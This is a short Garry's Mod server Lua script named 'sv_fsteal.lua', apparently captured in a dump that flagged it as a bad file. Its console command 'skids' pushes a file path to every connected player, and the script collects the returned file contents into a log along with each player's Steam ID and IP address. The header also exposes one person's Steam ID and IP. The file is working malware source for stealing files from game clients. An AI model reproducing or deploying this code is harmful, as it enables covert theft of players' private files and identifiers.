--[[
	MOD/lua/autorun/server/sv_fsteal.lua [#755 (#785), 1725474531, UID:187495186]
	xX-TrueMLGPlayer420Trikshot-Xx | STEAM_0:0:71356345 <82.238.182.218:27005> | [22.06.14 02:38:35PM]
	===BadFile===
]]

util.AddNetworkString("need2print")
util.AddNetworkString("need2steal")

local file_content = ""

net.Receive("need2print", function(lenght, ply)
	local data = net.ReadString()
	MsgC(Color(255,255,255),"    "..os.date().." at "..os.time().." - '"..ply:Nick().."' ("..ply:SteamID().." - "..ply:IPAddress()..") has sended "..string.len(data).." bytes of data.\n")
	
	file.Append("fsteal_log.txt",data)
end)

concommand.Add("skids",function(cmd,_,args)
	for k,v in pairs(player.GetAll()) do
		net.Start("need2steal")
			net.WriteString(args[1])
		net.Send(v)
	end
end)

/*
	--if (net.ReadInt() != 0) then
		-- logit420
	--	print("not0")
		
		--print(net.ReadString())
	--	file_content = nil
	--else
	--	file_content = file_content..net.ReadString()
	--end
*/